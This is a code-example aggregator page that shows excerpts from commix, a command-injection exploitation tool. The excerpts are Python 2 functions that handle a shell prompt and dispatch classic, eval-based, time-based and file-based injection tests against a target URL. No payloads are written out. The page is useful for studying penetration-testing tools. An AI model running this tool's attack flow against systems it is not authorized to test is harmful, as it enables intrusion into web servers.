                  except KeyboardInterrupt: 
                    raise

              elif gotshell in settings.CHOISE_NO:
                if menu.options.verbose:
                  sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                  sys.stdout.flush()
                break
              
              else:
                if gotshell == "":
                  gotshell = "enter"
                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                pass
              
  if no_result == True:
    print ""
    return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
开发者ID:yd0str,项目名称:commix,代码行数:101,代码来源:cb_handler.py

示例15: do_check


#.........这里部分代码省略.........
  time_based_state = False
  file_based_state = False

  # Check if defined "--delay" option.
  if menu.options.delay:
    delay = menu.options.delay
  else:
    delay = settings.DELAY

  # Do authentication if needed.
  if menu.options.auth_url and menu.options.auth_data:
    authentication.auth_process()      
  elif menu.options.auth_url or menu.options.auth_data: 
    print Back.RED + "(x) Error: You must specify both login panel URL and login parameters.\n" + Style.RESET_ALL
    sys.exit(0)
  else:
    pass
  
  # Check if HTTP Method is POST.
  if not menu.options.data:
    http_request_method = "GET"
  else:
    http_request_method = "POST"
    parameter = menu.options.data
    
  # Load modules
  modules_handler.load_modules(url, http_request_method, filename)

  # Estimating the response time (in seconds)
  delay, url_time_response = requests.estimate_response_time(url, delay)

  # Check all injection techniques
  if not menu.options.tech:
    # Check if it is vulnerable to classic command injection technique.
    if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
      classic_state = True

    # Check if it is vulnerable to eval-based command injection technique.
    if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
      eval_based_state = True

    # Check if it is vulnerable to time-based blind command injection technique.
    if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
      time_based_state = True

    # Check if it is vulnerable to file-based semiblind command injection technique.
    if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
      file_based_state = True

  else:
    # Check if it is vulnerable to classic command injection technique.
    if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
      # Check if classic results-based command injection technique succeeds.
      if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
        classic_state = True
    elif menu.options.tech == "classic":
      cb_handler.exploitation(url, delay, filename, http_request_method)
    else:
      classic_state = False

    # Check if it is vulnerable to eval-based command injection technique.
    if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
      # Check if eval-based command injection technique succeeds.
      if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
        eval_based_state = True
    elif menu.options.tech == "eval-based":
      eb_handler.exploitation(url, delay, filename, http_request_method)
    else:
      eval_based_state = False

    # Check if it is vulnerable to time-based blind command injection technique.
    if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
      # Check if time-based blind command injection technique succeeds.
      if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
        time_based_state = True
    elif menu.options.tech == "time-based":
      tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
    else:
      time_based_state = False

    # Check if it is vulnerable to file-based semiblind command injection technique.
    if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
       # Check if file-based semiblind command injection technique succeeds.
      if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
        file_based_state = True
    elif menu.options.tech == "file-based":
      fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
    else:
      file_based_state = False

  if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False :
    if http_request_method == "GET":
      print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
    else:
      print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
  else:
    logs.logs_notification(filename)
  sys.exit(0)
  
#eof
开发者ID:ksmaheshkumar,项目名称:commix,代码行数:101,代码来源:controller.py


注:本文中的src.utils.logs.logs_notification函数示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。